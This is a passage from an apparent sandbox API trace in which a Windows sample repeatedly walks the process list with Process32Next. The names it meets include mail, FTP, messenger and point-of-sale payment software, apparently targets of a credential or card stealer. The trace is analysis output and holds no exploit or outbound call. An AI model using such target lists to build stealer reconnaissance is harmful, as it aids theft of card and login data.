cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0200.082] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0200.085] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0200.087] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0200.089] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0200.092] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0200.094] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0200.100] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0200.102] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0200.104] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0200.107] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0200.110] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0200.112] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0200.115] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0200.117] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0200.119] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0200.121] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0200.123] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0200.125] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0200.127] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0200.131] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0200.132] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0200.134] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0200.149] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0200.151] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0200.154] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0200.155] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0200.158] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0200.160] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0200.162] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0200.164] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0200.165] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0200.167] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0200.169] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0200.171] Process32Next (in: hSnapshot=0x208c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0200.172] CloseHandle (hObject=0x208c) returned 1 [0200.173] Sleep (dwMilliseconds=0x64) [0200.285] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20b0 [0200.301] Process32First (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.303] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0200.305] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0200.307] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.309] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0200.312] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.315] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0200.317] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0200.319] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0200.352] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.355] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.357] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0200.359] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.362] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.364] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.369] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.371] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.373] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.376] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.378] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0200.380] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0200.382] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0200.385] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0200.387] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.428] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0200.437] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0200.439] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0200.442] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0200.444] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0200.446] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0200.448] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.451] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.454] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0200.457] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0200.458] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.460] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0200.462] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0200.465] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0200.466] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0200.468] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0200.470] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0200.545] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0200.547] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0200.549] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0200.550] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0200.554] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0200.557] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0200.559] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0200.561] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0200.562] Process32Next (in: hSnapshot=0x20b0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, 